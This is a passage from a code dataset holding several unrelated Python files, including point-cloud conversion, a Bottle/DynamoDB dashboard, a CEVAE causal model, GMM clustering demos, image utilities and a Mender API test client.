parser.parse_args()\n\n pc = pd.DataFrame()\n\n for pcd in args.pcd:\n\n df = read_pcd(pcd).astype(float)\n df = df.round({v:3 for v in ['x', 'y', 'z', 'intensity'] if v in df.columns})\n\n if 'red' in df.columns:\n pass\n elif 'rgb' in df.columns:\n cmap = pd.DataFrame.from_dict({c:np.random.randint(0, high=255, size=3) for c in df.rgb.unique()},\n orient='index')\n cmap.reset_index(inplace=True)\n cmap.columns = ['rgb', 'red', 'green', 'blue']\n df = pd.merge(df, cmap, on='rgb')\n elif args.colour:\n df['red'] = np.random.randint(0, 255)\n df['green'] = np.random.randint(0, 255)\n df['blue'] = np.random.randint(0, 255)\n else:\n pass\n\n if args.rotation:\n M = np.loadtxt(args.rotation)\n pc = apply_rotation(M, pc)\n\n if not args.combine:\n write_ply(pcd.replace('.pcd', '.ply'), df)\n else:\n pc = pc.append(df)\n\n if args.combine:\n write_ply(args.combine[0], pc)\n\n","sub_path":"python/pcd2ply.py","file_name":"pcd2ply.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"141282942","text":"import csv\nfrom sequential_grid_analyzer import Grid\nfrom datetime import datetime\nfrom os import listdir\nimport infoblu as ib\nfrom sequential_graph import GridGraph\nimport weight_computator as wc\nimport pickle \n\npathInfoBlue = \"/Users/Kate/Desktop/PROGETTOBDC/roma_infoblu/output_20150301_ROMA.txt\"\npath = \"/Users/Kate/Desktop/PROGETTOBDC/elaboratedFiles/id_unici.csv\"\npathpresence = \"/Users/Kate/Desktop/PROGETTOBDC/elaboratedFiles/Presence.csv\"\npathunipol = \"/Users/Kate/Desktop/PROGETTOBDC/elaboratedFiles/Unipol.csv\"\npathviasat = \"/Users/Kate/Desktop/PROGETTOBDC/elaboratedFiles/Viasat.csv\"\ngriglia = Grid(\"/Users/Kate/Documents/Eleganza/roma-grid/intersection_Roma_W_GRIDIT_NEW\")\n\ndict_path, time = ib.elaborate_infoBlue(pathInfoBlue, griglia)\n\nwith 
open(\"/Users/Kate/Documents/Eleganza/dict_path.csv\", \"wb\") as smth:\n\twriter = csv.writer(smth)\n\tfor key in dict_path:\n\t\tvalue = dict_path[key]\n\t\tline = [key]\n\t\tfor i in range(0,len(value)):\n\t\t\tline.append(value[i])\n\t\twriter.writerow(line)\n\nwith open(\"/Users/Kate/Documents/Eleganza/time.csv\", \"wb\") as smth:\n\twriter = csv.writer(smth)\n\tfor key in time:\n\t\tvalue = time[key]\n\t\tline = [key, str(value[0]), str(value[1])]\n\t\twriter.writerow(line)\n\ninit = wc.weight_computator(griglia, path, pathpresence, pathunipol, pathviasat)\ninit.set_dictionary()\ninit.griglia = None\n\nout = open(\"/Users/Kate/Documents/Eleganza/init\",\"w\")\npickle.dump(init,out)\n\n","sub_path":"write_dictionaries.py","file_name":"write_dictionaries.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"121919045","text":"from bottle import route, run, template, redirect, request, static_file\nfrom bottle import TEMPLATE_PATH, jinja2_template as template\n\nimport os\nimport boto3\nimport urllib.request, urllib.parse\nimport json\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nTEMPLATE_PATH.append(BASE_DIR + \"/views\")\n\n@route('/css/')\ndef server_css(filename):\n \"\"\" setting for css file \"\"\"\n return static_file(filename, root=BASE_DIR+\"/static/css\")\n\n@route('/js/')\ndef server_js(filename):\n \"\"\" setting for js file \"\"\"\n return static_file(filename, root=BASE_DIR+\"/static/js\")\n\n@route('/img/')\ndef server_img(filename):\n \"\"\" setting for img file \"\"\"\n return static_file(filename, root=BASE_DIR+\"/static/img\")\n\n@route('/font/')\ndef server_font(filename):\n \"\"\" setting for font file \"\"\"\n return static_file(filename, root=BASE_DIR+\"/static/fonts\") \n\n####################\n# Connect to DynamoDB\n####################\ndynamodb = boto3.resource('dynamodb', region_name='us-west-2')\ntable_keys = dynamodb.Table('aiqapi-keys-t')\ntable_users = dynamodb.Table('aiqapi-users-t')\n\n####################\n# API URL (System Summary)\n####################\nbase_url = 'https://api.activeiq.netapp.com/v1/system/summary/level/'\n\n@route(\"/\")\ndef index():\n auth_key = get_auth_key()\n return template(\"index\", auth_key=auth_key)\n\n@route(\"/login\", method=\"POST\")\ndef login():\n user_name = request.forms.getunicode(\"username\")\n result = get_user_scope(user_name)\n scope_str = itemgetter('scopestring')(result['Item'])\n scope_id = itemgetter('scopeid')(result['Item'])\n if scope_str == 'all':\n url = base_url + 'customer/id/' + scope_id\n scope_name = \"サイト全体\"\n else:\n url = base_url + 'site/id/' + scope_id\n scope_name = scope_str\n items=get_items(url)\n counts_dict = items['inventory']['counts']\n types_dict = items['inventory']['types']\n print(types_dict)\n return template(\"userview\", counts=counts_dict, types_d=types_dict, scope_name=scope_name)\n\n####################\n# Functions\n####################\ndef get_items(url):\n headers = {\n 'Content-Type': 'application/json',\n 'authorizationToken':get_auth_key()\n }\n req = urllib.request.Request(url, headers=headers)\n print(req)\n with urllib.request.urlopen(req) as res:\n summary_list = json.loads(res.read().decode('utf-8'))\n return summary_list\n\ndef get_auth_key():\n response = table_keys.get_item(\n Key={\n 'cust_id': 1\n }\n )\n item = itemgetter('auth_key')(response['Item'])\n return item\n\ndef get_user_scope(uname):\n response = table_users.get_item(\n Key={\n 
'username': uname \n }\n )\n return response\n\n# Utility Function\ndef itemgetter(*items):\n if len(items) == 1:\n item = items[0]\n def g(obj):\n return obj[item]\n else:\n def g(obj):\n return tuple(obj[item] for item in items)\n return g\n\n####################\n# Invoke test server\n####################\nrun(host=\"0.0.0.0\", port=8080, debug=True, reloader=True)\n\n","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":3161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"408324108","text":"import xml.etree.cElementTree as et \nimport csv\n\ntree = et.parse (\"covid_cases_xml.xml\")\nroot = tree.getroot()\nDate_reported = []\nCountries_territories = []\nCases_number = []\nDeath_number = []\n\nfor date in root.iter(\"dateRep\"):\n Date_reported.append (date.text)\nfor countries in root.iter(\"countries\"):\n Countries_territories.append (countries.text)\nfor cases in root.iter(\"cases\"):\n Cases_number.append (cases.text)\nfor deaths in root.iter(\"deaths\"):\n Death_number.append (deaths.text)\n\ncovid_cases = open(\"covid_cases_parse\", \"w\")\nwriter = csv.writer(covid_cases)\nwriter.writerow([\"Date_reported\",\"Countries_territories\", \"Cases_number\", \"Death_number\"])\nfor i in range (len(Date_reported)):\n writer.writerow([Date_reported[i], Countries_territories[i], Cases_number[i], Death_number[i]])\n ","sub_path":"parse.xml.py","file_name":"parse.xml.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"13723057","text":"from chainer import Chain\r\nimport chainer.functions as F\r\nimport chainer.links as L\r\n\r\n\r\nclass Block(Chain):\r\n\r\n def __init__(self, ch = 192, fcl = 256, o_ch = 1):\r\n super(Block, self).__init__()\r\n self.ch = ch\r\n self.fcl = fcl\r\n self.o_ch = o_ch\r\n with self.init_scope():\r\n self.conv1 = L.Convolution2D(in_channels = self.ch, out_channels = self.ch, ksize = 2, pad = 1, nobias=True)\r\n self.bn1 = L.BatchNormalization(self.ch)\r\n self.conv2 = L.Convolution2D(in_channels = self.ch, out_channels = self.ch, ksize = 2, pad = 1, nobias=True)\r\n self.bn2 = L.BatchNormalization(self.ch)\r\n\r\n def __call__(self, x):\r\n h1 = F.relu(self.bn1(self.conv1(x)))\r\n h2 = self.bn2(self.conv2(h1))\r\n return F.relu(x + h2)\r\n\r\n\r\nclass PolicyValueResnet(Chain):\r\n def __init__(self, blocks = 5, ch = 192, fcl = 256, o_ch = 1):\r\n super(PolicyValueResnet, self).__init__()\r\n self.blocks = blocks\r\n self.ch = ch\r\n self.fcl = fcl\r\n self.o_ch = o_ch\r\n with self.init_scope():\r\n self.l1 = L.Convolution2D(in_channels = 2, out_channels = self.ch, ksize = 2, pad = 1)\r\n for i in range(1, blocks):\r\n self.add_link('b{}'.format(i), Block())\r\n # policy network\r\n self.policy = L.Convolution2D(in_channels = self.ch, out_channels = self.o_ch, ksize = 1, nobias = True)\r\n self.policy_bias = L.Bias(shape=(8 * 8 * self.o_ch))\r\n # value network\r\n self.value1 = L.Convolution2D(in_channels = self.ch, out_channels = self.o_ch, ksize = 1)\r\n self.value1_bn = L.BatchNormalization(self.o_ch)\r\n self.value2 = L.Linear(8 * 8 * self.o_ch, self.fcl)\r\n self.value3 = L.Linear(self.fcl, 1)\r\n\r\n def __call__(self, x):\r\n h = F.relu(self.l1(x))\r\n for i in range(1, self.blocks):\r\n h = self['b{}'.format(i)](h)\r\n # policy network\r\n h_policy = self.policy(h)\r\n u_policy = self.policy_bias(F.reshape(h_policy, (-1, 8 * 8 * self.o_ch)))\r\n # value network\r\n h_value 
= F.relu(self.value1_bn(self.value1(h)))\r\n        h_value = F.relu(self.value2(h_value))\r\n        u_value = self.value3(h_value)\r\n        return u_policy, u_value","sub_path":"network/policy_value_resnet.py","file_name":"policy_value_resnet.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"61709591","text":"import os\nimport cv2\nimport numpy as np\nimport PIL.Image as Image\nimport PIL.ImageColor as ImageColor\nimport PIL.ImageDraw as ImageDraw\nimport PIL.ImageFont as ImageFont\n\ndef draw_bboxs(image, ymin, xmin, ymax, xmax, color='red', thickness=4, display_str_list=(), use_normalized_coordinates=True):\n    draw = ImageDraw.Draw(image)\n    im_width, im_height = image.size\n    if use_normalized_coordinates:\n        (left, right, top, bottom) = (xmin * im_width, xmax * im_width, ymin * im_height, ymax * im_height)\n    else:\n        (left, right, top, bottom) = (xmin, xmax, ymin, ymax)\n    if thickness > 0:\n        draw.line([(left, top), (left, bottom), (right, bottom), (right, top), (left, top)], width=thickness, fill=color)\n\ndef visualize():\n    return 1\n\n\n\"\"\"\nSource: Google/Automl/Efficientdet\n\"\"\"\ndef draw_bounding_box_on_image(image,\n                               ymin,\n                               xmin,\n                               ymax,\n                               xmax,\n                               color='red',\n                               thickness=4,\n                               display_str_list=(),\n                               use_normalized_coordinates=True):\n    \"\"\"Adds a bounding box to an image.\n    Bounding box coordinates can be specified in either absolute (pixel) or\n    normalized coordinates by setting the use_normalized_coordinates argument.\n    Each string in display_str_list is displayed on a separate line above the\n    bounding box in black text on a rectangle filled with the input 'color'.\n    If the top of the bounding box extends to the edge of the image, the strings\n    are displayed below the bounding box.\n    Args:\n      image: a PIL.Image object.\n      ymin: ymin of bounding box.\n      xmin: xmin of bounding box.\n      ymax: ymax of bounding box.\n      xmax: xmax of bounding box.\n      color: color to draw bounding box. Default is red.\n      thickness: line thickness. Default value is 4.\n      display_str_list: list of strings to display in box (each to be shown on its\n        own line).\n      use_normalized_coordinates: If True (default), treat coordinates ymin, xmin,\n        ymax, xmax as relative to the image. 
Otherwise treat coordinates as\n absolute.\n \"\"\"\n draw = ImageDraw.Draw(image)\n im_width, im_height = image.size\n if use_normalized_coordinates:\n (left, right, top, bottom) = (xmin * im_width, xmax * im_width,\n ymin * im_height, ymax * im_height)\n else:\n (left, right, top, bottom) = (xmin, xmax, ymin, ymax)\n if thickness > 0:\n draw.line([(left, top), (left, bottom), (right, bottom), (right, top),\n (left, top)],\n width=thickness,\n fill=color)\n try:\n font = ImageFont.truetype('arial.ttf', 24)\n except IOError:\n font = ImageFont.load_default()\n\n # If the total height of the display strings added to the top of the bounding\n # box exceeds the top of the image, stack the strings below the bounding box\n # instead of above.\n display_str_heights = [font.getsize(ds)[1] for ds in display_str_list]\n # Each display_str has a top and bottom margin of 0.05x.\n total_display_str_height = (1 + 2 * 0.05) * sum(display_str_heights)\n\n if top > total_display_str_height:\n text_bottom = top\n else:\n text_bottom = bottom + total_display_str_height\n # Reverse list and print from bottom to top.\n for display_str in display_str_list[::-1]:\n text_width, text_height = font.getsize(display_str)\n margin = np.ceil(0.05 * text_height)\n draw.rectangle([(left, text_bottom - text_height - 2 * margin),\n (left + text_width, text_bottom)],\n fill=color)\n draw.text((left + margin, text_bottom - text_height - margin),\n display_str,\n fill='black',\n font=font)\n text_bottom -= text_height - 2 * margin\n\n\n\n\ndef resize_images_in_dir(dir_path, t_width, t_height):\n for image_path in sorted(os.listdir(dir_path)):\n print(image_path)\n if os.path.isfile(os.path.join(dir_path, image_path)):\n image = cv2.imread(os.path.join(dir_path, image_path))\n resized_image = cv2.resize(image, (t_width, t_height))\n ret = cv2.imwrite(os.path.join(dir_path, image_path), resized_image)\n print(ret)","sub_path":"tools/py/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"335443777","text":"from __future__ import absolute_import, division, print_function\nimport numpy as np\n\nimport edward as ed\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom edward.models import Normal, Bernoulli\n\nfrom Utils import batch_generator, evalaute_effect_estimate, get_fc_layer_fn, matching_estimate\n# ----------------------------------------------------------------------------------------------------------------------------#\n\n\ndef learn_standard(args, train_set, test_set, anlysis_flag=False):\n\n\n # Parameters\n n_hidd = 1000 # number of hidden units\n n_epoch = args.n_epoch\n learning_rate = 0.001\n batch_size = 128\n\n hidden_layer = get_fc_layer_fn(l2_reg_scale=1e-4, depth=1)\n out_layer = get_fc_layer_fn(l2_reg_scale=1e-4)\n\n x_train, t_train, y_train = train_set['X'], train_set['T'], train_set['Y']\n\n n_train = x_train.shape[0]\n x_dim = x_train.shape[1]\n\n batch_size = min(batch_size, n_train)\n\n # ------ Define Graph ---------------------#\n tf.reset_default_graph()\n # ------ Define Inputs ---------------------#\n # define placeholder which will receive data batches\n x_ph = tf.placeholder(tf.float32, [None, x_dim])\n t_ph = tf.placeholder(tf.float32, [None, 1])\n y_ph = tf.placeholder(tf.float32, [None, 1])\n\n n_ph = tf.shape(x_ph)[0] # number of samples fed to placeholders\n\n # ------ Define generative model /decoder-----------------------#\n\n z_dim = 5 #\n\n # p(z) - 
prior over latent variables:\n z = Normal(loc=tf.zeros([n_ph, z_dim]), scale=tf.ones([n_ph, z_dim]))\n\n latent_dim = z_dim\n\n # p(x|z) - likelihood of proxy X\n hidden = hidden_layer(z, n_hidd, tf.nn.elu)\n x = Normal(loc=out_layer(hidden, x_dim, None),\n scale=out_layer(hidden, x_dim, tf.nn.softplus),\n name='gaussian_px_z')\n\n # p(t|z)\n hidden = hidden_layer(z, n_hidd, tf.nn.elu)\n probs = out_layer(hidden, 1, tf.nn.sigmoid) # output in [0,1]\n t = Bernoulli(probs=probs, dtype=tf.float32, name='bernoulli_pt_z')\n\n # p(y|t,z)\n hidden = hidden_layer(z, n_hidd, tf.nn.elu) # shared hidden layer\n mu_y_t0 = out_layer(hidden, 1, None)\n mu_y_t1 = out_layer(hidden, 1, None)\n # y = Normal(loc=t * mu_y_t1 + (1. - t) * mu_y_t0, scale=tf.ones_like(mu_y_t0))\n sigma_y_t0 = out_layer(hidden, 1, tf.nn.softplus)\n sigma_y_t1 = out_layer(hidden, 1, tf.nn.softplus)\n y = Normal(loc=t * mu_y_t1 + (1. - t) * mu_y_t0,\n scale=t * sigma_y_t1 + (1. - t) * sigma_y_t0)\n\n\n # ------ Define inference model - CEVAE variational approximation (encoder)\n\n # q(t|x)\n hqt = hidden_layer(x_ph, n_hidd, tf.nn.elu)\n probs = out_layer(hqt, 1, tf.nn.sigmoid) # output in [0,1]\n qt = Bernoulli(probs=probs, dtype=tf.float32)\n\n # q(y|x,t)\n hqy = hidden_layer(x_ph, n_hidd, tf.nn.elu) # shared hidden layer\n mu_qy_t0 = out_layer(hqy, 1, None)\n mu_qy_t1 = out_layer(hqy, 1, tf.nn.elu)\n sigma_qy_t1 = out_layer(hqy, 1, tf.nn.softplus)\n sigma_qy_t0 = out_layer(hqy, 1, tf.nn.softplus)\n # qy = Normal(loc=qt * mu_qy_t1 + (1. - qt) * mu_qy_t0, scale=tf.ones_like(mu_qy_t0))\n qy = Normal(loc=qt * mu_qy_t1 + (1. - qt) * mu_qy_t0,\n scale=qt * sigma_qy_t1 + (1. - qt) * sigma_qy_t0)\n\n # q(z|x,t,y)\n inpt2 = tf.concat([x_ph, qy], axis=1)\n hqz = hidden_layer(inpt2, n_hidd, tf.nn.elu) # shared hidden layer\n muq_t0 = out_layer(hqz, latent_dim, None)\n sigmaq_t0 = out_layer(hqz, latent_dim, tf.nn.softplus)\n muq_t1 = out_layer(hqz, latent_dim, None)\n sigmaq_t1 = out_layer(hqz, latent_dim, tf.nn.softplus)\n qz = Normal(loc=qt * muq_t1 + (1. - qt) * muq_t0,\n scale=qt * sigmaq_t1 + (1. 
- qt) * sigmaq_t0)\n\n    # ------ Criticism / evaluation graph:\n    z_learned = ed.copy(qz, {x: x_ph})\n\n    # sample posterior predictive for p(y|z,t)\n    y_post = ed.copy(y, {z: qz, t: t_ph}, scope='y_post')\n    # crude approximation of the above\n    y_post_mean = ed.copy(y, {z: qz.mean(), t: t_ph}, scope='y_post_mean')\n\n    # ------ Training - Run variational inference\n\n    # Create data dictionary for edward\n    data = {x: x_ph, y: y_ph, qt: t_ph, t: t_ph, qy: y_ph}\n\n    batch_size = min(batch_size, n_train)\n    n_iter_per_epoch = n_train // batch_size\n\n    inference = ed.KLqp({z: qz}, data=data)\n    optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\n    data_scaling = n_train / batch_size # to scale likelihood against prior\n    inference.initialize(optimizer=optimizer, n_samples=5, n_iter=n_iter_per_epoch * n_epoch,\n                         scale={x: data_scaling, t: data_scaling, y: data_scaling})\n\n\n    # end graph def\n\n    with tf.Session() as sess:\n        tf.global_variables_initializer().run()\n\n        for epoch in range(n_epoch):\n            train_generator = batch_generator(np.random.permutation(n_train), batch_size)\n            avg_loss = 0.0\n            for j in range(n_iter_per_epoch):\n                # Take batch:\n                idx = next(train_generator)\n                x_b, t_b, y_b = x_train[idx], t_train[idx], y_train[idx]\n                info_dict = inference.update(feed_dict={x_ph: x_b, t_ph: t_b, y_ph: y_b})\n                inference.print_progress(info_dict)\n                avg_loss += info_dict['loss']\n            avg_loss = avg_loss / n_iter_per_epoch\n            avg_loss = avg_loss / batch_size\n            # print('Epoch {}, avg loss {}'.format(epoch, avg_loss))\n\n\n\n        # ------ Evaluation -\n        x_test = test_set['X']\n\n        # if z_dim == 1:\n        #     z_est = sess.run(z_learned.mean(), feed_dict={x_ph: x_test})\n        #     plt.scatter(x_test[:, 0].flatten(), z_est.flatten())\n        #     plt.xlabel('X_0')\n        #     plt.ylabel('Z')\n        #     plt.show()\n        #\n        #     z_est = sess.run(z_learned.mean(), feed_dict={x_ph: x_test})\n        #     plt.scatter(x_test[:, 1].flatten(), z_est.flatten())\n        #     plt.xlabel('X_1')\n        #     plt.ylabel('Z')\n        #     plt.show()\n\n        # CATE estimation:\n        if args.estimation_type == 'approx_posterior':\n            forced_t = np.ones((args.n_test, 1))\n            est_y1 = sess.run(y_post.mean(), feed_dict={x_ph: x_test, t_ph: forced_t})\n            est_y0 = sess.run(y_post.mean(), feed_dict={x_ph: x_test, t_ph: 0*forced_t})\n        elif args.estimation_type == 'latent_matching':\n            z_test = sess.run(z_learned.mean(), feed_dict={x_ph: x_test})\n            z_train = sess.run(z_learned.mean(), feed_dict={x_ph: x_train})\n            est_y0, est_y1 = matching_estimate(z_train, t_train, y_train, z_test, args.n_neighbours)\n        else:\n            raise ValueError('Unrecognised estimation_type')\n\n        return evalaute_effect_estimate(est_y0, est_y1, test_set, args, model_name='CEVAE, Latent dim: ' + str(latent_dim),\n                                        estimation_type=args.estimation_type)\n\n    # end session\n\n\n","sub_path":"learn_standard_CEVAE.py","file_name":"learn_standard_CEVAE.py","file_ext":"py","file_size_in_byte":6867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"74180811","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns; sns.set()\r\n\r\n\r\nfrom sklearn.datasets.samples_generator import make_blobs\r\nX, y_true = make_blobs(n_samples=400, centers=4, cluster_std=0.60, random_state=0)\r\nX = X[:, ::-1] # swap the columns for easier plotting\r\n\r\nfrom sklearn.cluster import KMeans\r\nkmeans = KMeans(4, random_state=0)\r\nlabels = kmeans.fit(X).predict(X)\r\nplt.scatter(X[:, 0], X[:, 1], c=labels, s=40, cmap='viridis')\r\nplt.show()\r\n\r\n\r\nfrom sklearn.cluster import KMeans\r\nfrom scipy.spatial.distance import cdist\r\n\r\ndef plot_kmeans(kmeans, X, n_cluster=4, rseed=0, ax=None):\r\n    labels = kmeans.fit_predict(X)\r\n\r\n    # plot the input data\r\n    ax = ax or plt.gca()\r\n    ax.axis('equal')\r\n    ax.scatter(X[:, 0], X[:, 1], c=labels, s=40, cmap='viridis', zorder=2)\r\n\r\n    # draw the k-means model representation\r\n    centers = kmeans.cluster_centers_\r\n    radii = [cdist(X[labels == i], [center]).max() for i, center in enumerate(centers)]\r\n    for c, r in zip(centers, radii):\r\n        ax.add_patch(plt.Circle(c, r, fc='#CCCCCC', lw=3, alpha=0.5, zorder=1))\r\n\r\nkmeans = KMeans(n_clusters=4, random_state=0)\r\nplot_kmeans(kmeans, X)\r\nplt.show()\r\n\r\n\r\nrng = np.random.RandomState(13)\r\nX_stretched = np.dot(X, rng.randn(2, 2))\r\n\r\nkmeans = KMeans(n_clusters=4, random_state=0)\r\nplot_kmeans(kmeans, X_stretched)\r\nplt.show()\r\n\r\n\r\n\"\"\"Gaussian mixture model (GMM)\"\"\"\r\nfrom sklearn.mixture import GMM\r\ngmm = GMM(n_components=4).fit(X)\r\nlabels = gmm.predict(X)\r\nprint(X.shape)\r\nplt.scatter(X[:, 0], X[:, 1], c=labels, s=40, cmap='viridis')\r\nplt.show()\r\n\r\nprobs = gmm.predict_proba(X)\r\nprint(probs[:5].round(3))\r\n\r\n# reflect the probability in the point size\r\nsize = 50 * probs.max(1) ** 2 # square to emphasize the differences\r\nplt.scatter(X[:, 0], X[:, 1], c=labels, cmap='viridis', s=size)\r\nplt.show()\r\n\r\nfrom matplotlib.patches import Ellipse\r\n\r\ndef draw_ellipse(position, covariance, ax=None, **kwargs):\r\n    \"\"\"Draw an ellipse at the given position with the given covariance\"\"\"\r\n    ax = ax or plt.gca()\r\n\r\n    # convert the covariance to principal axes\r\n    if covariance.shape == (2, 2):\r\n        U, s, Vt = np.linalg.svd(covariance)\r\n        angle = np.degrees(np.arctan2(U[1, 0], U[0, 0]))\r\n        width, height = 2 * np.sqrt(s)\r\n    else:\r\n        angle = 0\r\n        width, height = 2 * np.sqrt(covariance)\r\n\r\n    # draw the ellipse\r\n    for nsig in range(1, 4):\r\n        ax.add_patch(Ellipse(position, nsig * width, nsig * height, angle, **kwargs))\r\n\r\ndef plot_gmm(gmm, X, label=True, ax=None):\r\n    ax = ax or plt.gca()\r\n    labels = gmm.fit(X).predict(X)\r\n    if label:\r\n        ax.scatter(X[:, 0], X[:, 1], c=labels, s=40, cmap='viridis', zorder=2)\r\n    else:\r\n        ax.scatter(X[:, 0], X[:, 1], s=40, zorder=2)\r\n\r\n    ax.axis('equal')\r\n\r\n    w_factor = 0.2 / gmm.weights_.max()\r\n    for pos, covar, w in zip(gmm.means_, gmm.covars_, gmm.weights_):\r\n        draw_ellipse(pos, covar, alpha=w * w_factor)\r\n\r\ngmm = GMM(n_components=4, random_state=42)\r\nplot_gmm(gmm, X)\r\nplt.show()\r\n\r\ngmm = GMM(n_components=4, covariance_type='full', random_state=42)\r\nplot_gmm(gmm, X_stretched)\r\nplt.show()\r\n\r\n\r\n\"\"\"Density estimation with a GMM\"\"\"\r\nfrom sklearn.datasets import make_moons\r\nXmoon, ymoon = make_moons(200, noise=.05, random_state=0)\r\nplt.scatter(Xmoon[:, 0], Xmoon[:, 1])\r\nplt.show()\r\n\r\n# fit with 2 components\r\ngmm2 = GMM(n_components=2, covariance_type='full', random_state=0)\r\nplot_gmm(gmm2, Xmoon)\r\nplt.show()\r\n\r\n# fit with 16 components\r\ngmm16 = GMM(n_components=16, covariance_type='full', random_state=0)\r\nplot_gmm(gmm16, Xmoon)\r\nplt.show()\r\n\r\n# generate new data from the 16-component GMM\r\nXnew = gmm16.sample(400, random_state=42)\r\nplt.scatter(Xnew[:, 0], Xnew[:, 1])\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"PyhtonDataScienceHandbook/GMM/Gaussian_mixture_model.py","file_name":"Gaussian_mixture_model.py","file_ext":"py","file_size_in_byte":3667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"631930968","text":"#!/usr/bin/python\n# Copyright 2016 Mender Software AS\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may 
obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport os.path\nimport logging\n\nimport pytest\nfrom bravado.swagger_model import load_file\nfrom bravado.client import SwaggerClient, RequestsClient\nfrom requests.utils import parse_header_links\n\n\nAPI_URL = \"http://%s/api/%s/\" % \\\n (pytest.config.getoption(\"host\"), \\\n pytest.config.getoption(\"api\"))\n\n\nclass Client(object):\n\n config = {\n 'also_return_response': True,\n 'validate_responses': True,\n 'validate_requests': False,\n 'validate_swagger_spec': False,\n 'use_models': True,\n }\n\n\n def setup(self):\n self.log = logging.getLogger(\"client.Client\")\n self.api_url = API_URL\n self.http_client = RequestsClient()\n self.http_client.session.verify = False\n\n spec = pytest.config.getoption(\"spec\")\n self.client = SwaggerClient.from_spec(load_file(spec),\n config=self.config,\n http_client=self.http_client)\n self.client.swagger_spec.api_url = self.api_url\n\n def make_api_url(self, path):\n return os.path.join(self.api_url,\n path if not path.startswith(\"/\") else path[1:])\n\n def accept_device(self, devid):\n return self.put_device_status(devid, 'accepted')\n\n def reject_device(self, devid):\n return self.put_device_status(devid, 'rejected')\n\n def put_device_status(self, devid, status):\n Status = self.client.get_model('Status')\n st = Status(status=status)\n return self.client.devices.put_devices_id_status(id=devid, status=st).result()\n\n def verify_token(self, token):\n # The original body was a copy-paste of put_device_status and referenced\n # the undefined names devid and st; fail loudly until implemented.\n raise NotImplementedError(\"token verification is not implemented\")\n","sub_path":"tests/tests/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"136448115","text":"# import cv2 as cv\n# import numpy as np\n# img = cv.imread('j.png',0)\n# kernel = np.ones((5,5),np.uint8)\n# erosion = cv.erode(img,kernel,iterations = 1)\n\n\n# Python program to demonstrate erosion and \n# dilation of images. 
\nimport cv2 \nimport numpy as np \nimport glog as log\n\ndef _connect_components_analysis(image):\n \"\"\"\n connect components analysis to remove the small components\n :param image:\n :return:\n \"\"\"\n if len(image.shape) == 3:\n gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n else:\n gray_image = image\n\n return cv2.connectedComponentsWithStats(gray_image, connectivity=8, ltype=cv2.CV_32S)\n\n# Reading the input image \n# img = cv2.imread('/aimldl-dat/logs/testing/morphology/instance/170419_131147_16716_zed_l_030.jpg', 0) \n# img = cv2.imread('/aimldl-dat/logs/testing/morphology/instance/170419_131147_16716_zed_l_030.jpg') \nimg = cv2.imread('/aimldl-dat/logs/testing/morphology/instance/170419_130711_16716_zed_l_051.jpg') \n\n\n# Taking a matrix of size 5 as the kernel \nkernel = np.ones((5,5), np.uint8) \n\n# The first parameter is the original image, \n# kernel is the matrix with which image is \n# convolved and third parameter is the number \n# of iterations, which will determine how much \n# you want to erode/dilate a given image.\n\nopening = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel)\n\n# connect_components_analysis_ret = _connect_components_analysis(image=img)\n# log.info(\"connect_components_analysis_ret : {}\".format(connect_components_analysis_ret[1]))\n\nimg_erosion = cv2.erode(opening, kernel, iterations=1) \nimg_dilation = cv2.dilate(img, kernel, iterations=1) \nedges = cv2.Canny(img,100,200)\n\n\ncv2.imshow('Input', img) \ncv2.imshow('Opening', opening) \ncv2.imshow('Erosion', img_erosion) \ncv2.imshow('Dilation', img_dilation) \ncv2.imshow('Edges', edges) \n# cv2.imwrite('edges.jpg',edges)\n\ncv2.waitKey(0) \n","sub_path":"python/morphology.py","file_name":"morphology.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"89244435","text":"# -*- coding: utf-8 -*-\nfrom Acquisition import aq_inner\nfrom plone.app.portlets import PloneMessageFactory as _\nfrom plone.app.portlets.portlets import base\nfrom plone.memoize import view as pm_view\nfrom plone.portlets.interfaces import IPortletDataProvider\nfrom Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\nfrom zope import schema\nfrom zope.component import getMultiAdapter\nfrom zope.interface import implements\n\n\nclass IActionsPortlet(IPortletDataProvider):\n \"\"\"A portlet that shows an action category\"\"\"\n\n ptitle = schema.TextLine(\n title=_(u'label_title',\n default=u\"Title\"),\n description=_(u'help_title',\n default=u\"Displayed title of this portlet\"),\n default=u\"\",\n required=False)\n\n show_title 